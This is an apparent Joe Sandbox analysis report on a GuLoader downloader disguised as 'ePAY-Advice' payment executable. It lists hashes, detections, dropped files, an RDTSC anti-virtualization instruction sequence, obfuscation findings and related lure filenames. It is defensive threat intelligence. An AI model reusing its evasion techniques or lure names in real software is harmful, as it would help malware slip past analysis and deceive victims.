Edit tour

Windows Analysis Report
ePAY-Advice_Rf[UC7749879100].exe

Overview

General Information

Sample Name:	ePAY-Advice_Rf[UC7749879100].exe
Analysis ID:	828721
MD5:	06bf8620598b674fc3506a2844d42d65
SHA1:	00e28bd96e338f7bfff9c41d985de05f010d8ea7
SHA256:	98883d7d2678fd8cbdad8b8c1ca7cf13a797b1074f081dee24aba14dcc346ffe
Tags:	exeguloaderlokibotsigned
Infos:

Detection

GuLoader

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Tries to detect virtualization through RDTSC time measurements

Uses 32bit PE files

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

PE / OLE file has an invalid certificate

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

ePAY-Advice_Rf[UC7749879100].exe (PID: 6136 cmdline: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe MD5: 06BF8620598B674FC3506A2844D42D65)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://blog.malwarebytes.com/scams/2020/08/sba-phishing-scams-from-malware-to-advanced-social-engineering/ https://blog.morphisec.com/guloader-the-rat-downloader https://blog.vincss.net/2020/05/re014-guloader-antivm-techniques.html https://cert-agid.gov.it/news/malware/tecniche-per-semplificare-lanalisi-del-malware-guloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.824199107.0000000004568000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: ePAY-Advice_Rf[UC7749879100].exe PID: 6136	JoeSecurity_GuLoader_3	Yara detected GuLoader	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: ePAY-Advice_Rf[UC7749879100].exe	ReversingLabs: Detection: 28%
Source: ePAY-Advice_Rf[UC7749879100].exe	Virustotal: Detection: 32%			Perma Link

Source: ePAY-Advice_Rf[UC7749879100].exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: ePAY-Advice_Rf[UC7749879100].exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Binary string: D:\SourceCode\GC3.Overclocking\production_V4.2\Service\ServiceSDK\Release\ThrottlePlugin\AEGISIIIRadeonHelper.pdb source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe	Code function: 0_2_0040626D FindFirstFileA,FindClose,	0_2_0040626D
Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe	Code function: 0_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405732
Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe	Code function: 0_2_004026FE FindFirstFileA,	0_2_004026FE

Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: http://crl.globalsign.com/gsextendcodesignsha2g3.crl0
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0b
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: ePAY-Advice_Rf[UC7749879100].exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: ePAY-Advice_Rf[UC7749879100].exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/gsextendcodesignsha2g30U
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gsextendcodesignsha2g3ocsp.crt0
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp, AEGISIIIRadeonHelper.dll.0.dr	String found in binary or memory: https://www.globalsign.com/repository/0

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

Code function: 0_2_004051CF GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_004051CF

Source: ePAY-Advice_Rf[UC7749879100].exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: ePAY-Advice_Rf[UC7749879100].exe, 00000000.00000003.302601111.000000000283C000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: OriginalFilenameAEGISIIIRadeonHelper< vs ePAY-Advice_Rf[UC7749879100].exe

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

Code function: 0_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_004031D6

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe	Code function: 0_2_00404A0E	0_2_00404A0E
Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe	Code function: 0_2_004065F6	0_2_004065F6
Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe	Code function: 0_2_6E161A9C	0_2_6E161A9C

Source: ePAY-Advice_Rf[UC7749879100].exe

Static PE information: invalid certificate

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

Process Stats: CPU usage > 98%

Source: ePAY-Advice_Rf[UC7749879100].exe	ReversingLabs: Detection: 28%
Source: ePAY-Advice_Rf[UC7749879100].exe	Virustotal: Detection: 32%

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

File read: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

Jump to behavior

Source: ePAY-Advice_Rf[UC7749879100].exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

0_2_004031D6

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

File created: C:\Users\user\AppData\Roaming\fumigatorium

Jump to behavior

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

File created: C:\Users\user\AppData\Local\Temp\nsoCDB4.tmp

Jump to behavior

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

File written: C:\Users\user\AppData\Local\Temp\Kontos.ini

Jump to behavior

Source: classification engine

Classification label: mal68.troj.evad.winEXE@1/17@0/0

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

Code function: 0_2_004020D1 CoCreateInstance,MultiByteToWideChar,

0_2_004020D1

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

Code function: 0_2_0040449B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_0040449B

Source: ePAY-Advice_Rf[UC7749879100].exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: Process Memory Space: ePAY-Advice_Rf[UC7749879100].exe PID: 6136, type: MEMORYSTR
Source: Yara match	File source: 00000000.00000002.824199107.0000000004568000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

Code function: 0_2_6E162F20 push eax; ret

0_2_6E162F4E

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

Code function: 0_2_6E161A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_6E161A9C

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe	File created: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\AEGISIIIRadeonHelper.dll			Jump to dropped file
Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe	File created: C:\Users\user\AppData\Local\Temp\nslD140.tmp\System.dll			Jump to dropped file

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

RDTSC instruction interceptor: First address: 0000000004CAC6E4 second address: 0000000004CAC6E4 instructions: 0x00000000 rdtsc 0x00000002 test cx, cx 0x00000005 cmp dx, cx 0x00000008 cmp ebx, ecx 0x0000000a jc 00007FA1BC50078Dh 0x0000000c cmp ecx, edx 0x0000000e cmp al, dl 0x00000010 inc ebp 0x00000011 cmp bx, ax 0x00000014 inc ebx 0x00000015 rdtsc

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\AEGISIIIRadeonHelper.dll

Jump to dropped file

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe	Code function: 0_2_0040626D FindFirstFileA,FindClose,	0_2_0040626D
Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe	Code function: 0_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405732
Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe	Code function: 0_2_004026FE FindFirstFileA,	0_2_004026FE

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe	API call chain: ExitProcess graph end node			graph_0-4749
Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe	API call chain: ExitProcess graph end node			graph_0-4919

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

Code function: 0_2_6E161A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

0_2_6E161A9C

Source: C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe

0_2_004031D6

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Native API	Path Interception	1 Access Token Manipulation	1 Masquerading	OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Access Token Manipulation	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	1 Clipboard Data	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Obfuscated Files or Information	Security Account Manager	13 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ePAY-Advice_Rf[UC7749879100].exe	28%	ReversingLabs	Win32.Trojan.GuLoader
ePAY-Advice_Rf[UC7749879100].exe	32%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\nslD140.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\AEGISIIIRadeonHelper.dll	0%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.0.ePAY-Advice_Rf[UC7749879100].exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491		Download File
0.2.ePAY-Advice_Rf[UC7749879100].exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1223491		Download File

Domains

⊘No Antivirus matches

URLs

⊘No Antivirus matches

Domains and IPs

Contacted Domains

⊘No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	ePAY-Advice_Rf[UC7749879100].exe	false		high
http://nsis.sf.net/NSIS_ErrorError	ePAY-Advice_Rf[UC7749879100].exe	false		high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	828721
Start date and time:	2023-03-17 13:56:47 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	ePAY-Advice_Rf[UC7749879100].exe
Detection:	MAL
Classification:	mal68.troj.evad.winEXE@1/17@0/0
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 63.2% (good quality ratio 61.9%) Quality average: 88.9% Quality standard deviation: 21.5%
HCA Information:	Successful, ratio: 99% Number of executed functions: 53 Number of non-executed functions: 28
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nslD140.tmp\System.dll	SC_TR11670000.exe	Get hash	malicious	GuLoader, Lokibot	Browse
	SC_TR11670000.exe	Get hash	malicious	GuLoader	Browse
	DHLAWBNO#907853880911.exe	Get hash	malicious	GuLoader, Lokibot	Browse
	DHLAWBNO#907853880911.exe	Get hash	malicious	GuLoader	Browse
	SCAN001REMITTANCEHMIECPDF.exe	Get hash	malicious	GuLoader, Lokibot	Browse
	SCAN001REMITTANCEHMIECPDF.exe	Get hash	malicious	GuLoader	Browse
	Solicitud_de_Cotizaci#U00f3n_(Ulatina)_15-03-23#U00b7pd.exe	Get hash	malicious	AveMaria, GuLoader, UACMe	Browse
	Solicitud_de_Cotizaci#U00f3n_(Ulatina)_15-03-23#U00b7pd.exe	Get hash	malicious	GuLoader	Browse
	(RFQ-_MRF343951_)_BULIM_PHASE_2_pdf.exe	Get hash	malicious	GuLoader, Lokibot	Browse
	(RFQ-_MRF343951_)_BULIM_PHASE_2_pdf.exe	Get hash	malicious	GuLoader	Browse
	MZykmSpz4e.exe	Get hash	malicious	FormBook, GuLoader	Browse
	MZykmSpz4e.exe	Get hash	malicious	GuLoader	Browse
	rCL-PLCOPY.exe	Get hash	malicious	FormBook, GuLoader	Browse
	rCL-PLCOPY.exe	Get hash	malicious	GuLoader	Browse
	Payment_Advice.exe	Get hash	malicious	GuLoader	Browse
	Payment_Advice.exe	Get hash	malicious	GuLoader	Browse
	justificante transferencia.exe	Get hash	malicious	GuLoader	Browse
	justificante transferencia.exe	Get hash	malicious	GuLoader	Browse
	Tvivlraadig.exe	Get hash	malicious	GuLoader	Browse
	Tvivlraadig.exe	Get hash	malicious	GuLoader	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Temp\Kontos.ini

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	54
Entropy (8bit):	4.838039816898156
Encrypted:	false
SSDEEP:	3:7KG/LmI/cXQQLQIfLBJXmgxv:OG/LmI/cXQQkIP2I
MD5:	FB5EE2C0CAC332EC8390F50016EF0769
SHA1:	11D9FB52FE5289140B9D52A38B56F99512B3A3A7
SHA-256:	C557AFE51AB22916E3423820A09D3805BF9DCDCECBEC4FE8DE2C67FB023BA631
SHA-512:	87CCEA7B203B8BFC4E21544FE4FE9693AF230E246C450E673410565791DFE8257E30354772FDCC114C7068D9295FDB491E9B52D1A3B490C0756E568B70B95C0A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Bedrock]..Interthing=user32::EnumWindows(i r1 ,i 0)..

C:\Users\user\AppData\Local\Temp\nslD140.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	11776
Entropy (8bit):	5.832316471889005
Encrypted:	false
SSDEEP:	192:4PtkiQJr7jHYT87RfwXQ6YSYtOuVDi7IsFW14Ll8CO:H78TQIgGCDp14LGC
MD5:	B0C77267F13B2F87C084FD86EF51CCFC
SHA1:	F7543F9E9B4F04386DFBF33C38CBED1BF205AFB3
SHA-256:	A0CAC4CF4852895619BC7743EBEB89F9E4927CCDB9E66B1BCD92A4136D0F9C77
SHA-512:	F2B57A2EEA00F52A3C7080F4B5F2BB85A7A9B9F16D12DA8F8FF673824556C62A0F742B72BE0FD82A2612A4B6DBD7E0FDC27065212DA703C2F7E28D199696F66E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SC_TR11670000.exe, Detection: malicious, Browse Filename: SC_TR11670000.exe, Detection: malicious, Browse Filename: DHLAWBNO#907853880911.exe, Detection: malicious, Browse Filename: DHLAWBNO#907853880911.exe, Detection: malicious, Browse Filename: SCAN001REMITTANCEHMIECPDF.exe, Detection: malicious, Browse Filename: SCAN001REMITTANCEHMIECPDF.exe, Detection: malicious, Browse Filename: Solicitud_de_Cotizaci#U00f3n_(Ulatina)_15-03-23#U00b7pd.exe, Detection: malicious, Browse Filename: Solicitud_de_Cotizaci#U00f3n_(Ulatina)_15-03-23#U00b7pd.exe, Detection: malicious, Browse Filename: (RFQ-_MRF343951_)_BULIM_PHASE_2_pdf.exe, Detection: malicious, Browse Filename: (RFQ-_MRF343951_)_BULIM_PHASE_2_pdf.exe, Detection: malicious, Browse Filename: MZykmSpz4e.exe, Detection: malicious, Browse Filename: MZykmSpz4e.exe, Detection: malicious, Browse Filename: rCL-PLCOPY.exe, Detection: malicious, Browse Filename: rCL-PLCOPY.exe, Detection: malicious, Browse Filename: Payment_Advice.exe, Detection: malicious, Browse Filename: Payment_Advice.exe, Detection: malicious, Browse Filename: justificante transferencia.exe, Detection: malicious, Browse Filename: justificante transferencia.exe, Detection: malicious, Browse Filename: Tvivlraadig.exe, Detection: malicious, Browse Filename: Tvivlraadig.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir.-.D.-.D.-.D...J..D.-.E.>.D......D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....oZ...........!..... ...........(.......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text...O........ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..\|....P.....................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\AEGISIIIRadeonHelper.dll

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	34016
Entropy (8bit):	6.1021284380541925
Encrypted:	false
SSDEEP:	384:JP7a6wQdSCVWSdoEdXjYmxzfkfIwuWR7UPMEdxsTStsBdMQJK2wKucYkcuhV3:N7a6eiHdFdr7W5UPMgy+OBG2X90uhV3
MD5:	4FC7FC174E80C178225C2509027DF961
SHA1:	9FF62413EC0DD462F5F016EBC804F1D736D24796
SHA-256:	866B31DD39B97DEDAFD0FBD5672639EE91B47AD319C47816B4F6D01BFF93FF8C
SHA-512:	29261B9ABC4AF2F51C05B61A37721BC737B411530361A4B48A7BFFAB0F8263EA75BFD51B6E6E94E91E1D02DC442B534C3334B05FD8324E7CF307FA08179A1ED9
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Z.oPZ.oPZ.oPS..PR.oP..nQX.oP..jQK.oP..kQR.oP..lQX.oP).nQY.oPZ.nPt.oP..fQY.oP..oQ[.oP..P[.oPZ..P[.oP..mQ[.oPRichZ.oP........PE..d....5;a.........." .....0...:.......................................................F....`..........................................\.......]..........H............f..........H....O..p...........................@P...............@..p............................text............0.................. ..`.rdata...#...@...$...4..............@..@.data...@....p.......X..............@....pdata...............Z..............@..@.rsrc...H............^..............@..@.reloc..H............d..............@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Fatalismen.Int

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	data
Category:	dropped
Size (bytes):	295288
Entropy (8bit):	6.745618664148764
Encrypted:	false
SSDEEP:	3072:x+/xc6g1BpoF5SmRfY+uynGbbqwHzp8d7fMUMQpnf+Dk64qR/2sE4GjEZQ2CfDU4:MkpGQqruyGqIzgsG5Nq/uC4fQzbEI2
MD5:	4D698E219A6C687613078B94085D51FE
SHA1:	52A9BD9EF707F72A14006D4FDA0989F11A5616B9
SHA-256:	5E0F6244C6A33528CFCEC4C23F45F6238EA57818484B602086D26562F498EF49
SHA-512:	02E934B3374EE1CF9195FC7C329D0F4AC4A8DFBB081CDD04F4D76CF5EA92353507B34EAC099A5161CCD36BF11048FA3588A4D7F029FE585979A1D3E3C93E150B
Malicious:	false
Preview:	.......j...........<.........&&...........D.\\\\.......#.........+....C..................>...R.....yy........................bb.............$................... ..........................IIII.......PPP............'......T..TTT...77..ww...........\....0..J......................~..........................`................................s............;;...NN.................L..........................((..................aaaa..............5...KKKKKKKKK.j...{...u................55.s......>..w............W...................................2..........AA.....f............J..................../...S...............<.(.............cccc..AA...JJ.N.......TT......................~.......-.............m......0000....&...t..U.OO......................WW..................................&......................................66..................VVV....J..44.//...........\\..._...x.O.............................ff.................................y.........BBB....zz.....444................................

C:\Users\user\AppData\Roaming\fumigatorium\Tertser\Omstrukturdnr\Provokations.Fje

Download File

Process:	C:\Users\user\Desktop\ePAY-Advice_Rf[UC7749879100].exe
File Type:	data
Category:	dropped
Size (bytes):	35747
Entropy (8bit):	4.582392134953922
Encrypted:	false
